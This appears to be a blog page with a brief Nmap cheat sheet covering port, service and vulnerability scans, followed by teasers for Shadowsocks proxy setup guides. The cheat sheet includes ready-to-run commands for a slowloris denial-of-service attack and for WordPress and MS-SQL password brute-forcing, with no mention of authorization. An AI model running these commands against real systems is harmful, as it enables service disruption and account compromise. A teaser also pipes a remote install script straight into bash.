Use Nmap to Scan Ports (cheat sheet)

-

1.Basic scan

nmap 41.22.10.1

nmap yourdomain.com

2.Scan specific ports

nmap -p 1-65535 41.22.10.1

nmap -p 1,443 41.22.10.1

3.Scan multipul ips

nmap 1.1.1.1 1.1.1.2

nmap 1.1.1.1,2,3,4

(This will scan 1.1.1.1 1.1.1.2 1.1.1.3 1.1.1.4)

nmap 1.1.1.1-4

nmap 1.1.1.*

nmap 1.1.1.0/28

4.Scan popular ports

nmap --top-ports 20 1.1.1.1

(Scan 20 ports of 1.1.1.1)

5.Scan target from a file

nmap -iL list.txt

6.Scan an Service detection

nmap -A -T4 1.1.1.1

(-A is for service detection. -T4 speeds up this operation)

7.Detect Service/Daemon

nmap -sV 1.1.1.1

8.Scan using UDP/TCP

nmap -sT 1.1.1.1

(For TCP)

nmap -sU 1.1.1.1

(For UDP)

9.Vulnerability detection

nmap -Pn --script vuln 1.1.1.1

10.Launch DOS Attack

nmap 1.1.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

11.Lauch brute force attacks

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 1.1.1.1

(Wordpress brute force attack)

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 1.1.1.1

(Ms-sql brute force attack)

12.Detect malware infections

nmap -sV --script=http-malware-host 1.1.1.1

nmap -p80 --script http-google-malware 1.1.1.1

(Google malware check)

评论

发表评论

此博客中的热门博文

Configure shadowsocks transparent proxy + gfwlist(PAC) on OpenWRT Router

-
You must have Shadowsocks services which can be gained in the following way before actually starting to configure. Purchase Shadowsocks Service directly online. Recommendation:  Just My Socks Quick Shadowsocks configuration using Just My Socks, please click here . Build the service yourself. Please refer to  Configure V2Ray(Shadowsocks mode) + 加速:普通BBR/魔改BBR on KVM VPS (Tested on Ubuntu 16.04) . The environment this article used, FYI: OpenWrt 18.06.1/LuCI openwrt-18.06 The Overall Idea: DNS part: if the requested address is in gfwlist     forward DNS request to 127.0.0.1:5353 which is listened by dns-forwarder     dns-forwarder forwards the request to 8.8.8.8 for translating     8.8.8.8 is in gfwlist, so match iptables rules and is fowared to 1080     ss-redir listen on port 1080, foward request to shadowsocks server else     use public DNS servers or the DNS servers provided by the ISP other da...
阅读全文

Openwrt路由器上配置shadowsocks透明代理+gfwlist(PAC)

-
Shadowsocks 服务推荐: Just My Socks 推荐理由:价格便宜,支持月付,安全灵活。 本文配置的前提是已经有shadowsocks服务。你可以通过购买或者自行搭建的方式获得。以下是链接: 直接购买网上的服务,此处推荐 Just My Socks 快速Just My Socks配置Shadowsocks,请点 这里 。 自行搭建,请参考 KVM VPS上配置V2Ray(Shadowsocks mode) + 加速:普通BBR/魔改BBR(测试于Ubuntu 16.04) 本文所使用的环境,仅作参考: OpenWrt 18.06.1/LuCI openwrt-18.06 整体思路: DNS部分: if 访问地址在gfwlist中     DNS请求转发到127.0.0.1:5353的dns-forwarder的监听端口     dns-forwarder转发到8.8.8.8进行解析     8.8.8.8在gfwlist中,通过匹配iptables规则转发到1080端口     ss-redir监听1080端口,通过shadowsocks代理服务器转发请求 else     正常使用公共DNS或者ISP提供的DNS服务器 其他数据: if 访问地址在gfwlist中     通过匹配iptables规则转发到1080端口     ss-redir监听1080端口,通过shadowsocks代理服务器转发请求 else     正常访问 步骤1:依赖包安装( 非常重要 ) 本文所有的操作都基于SSH和Web管理界面操作。 首先通过SSH添加GPG Key,这样之后添加的源才能通过签名验证: wget http://openwrt-dist.sourceforge.net/packages/openwrt-dist.pub -O /tmp/openwrt-dist.pub opkg-key add /tmp/openwrt-dist.pub 然后在OpenWRT Web管理界面,“...
阅读全文

Configure V2Ray(Shadowsocks mode) + 加速:普通BBR/魔改BBR on KVM VPS (Tested on Ubuntu 16.04)

-
First of all, you will need to deploy a VPS with KVM technology as BBR does not support OpenVZ but KVM. I recommend Bandwagonhost and Vultr because of the price. Here is the link to register and deploy: Bandwagonhost Vultr (Or click here to get a big discount, only available for a LIMITED TIME ) Here I suggest you choose Ubuntu 16.04 or later versions as your OS. After everything is ready and you can successfully ping your server from your local environment, connect to your VPS via SSH. Now let's start. Step 1: V2RAY V2RAY is a new generation of software for data proxy. It supports almost all protocols. Here let's choose Shadowsocks as our protocol with which most of us are familiar. Type in the following command in your SSH terminal to install: bash <(curl -L -s https://install.direct/go.sh) Then use your favorite text editor to edit the configuration file located at '/etc/v2ray/config.json'. Here I use vim as my editor and you can use whatever you a...
阅读全文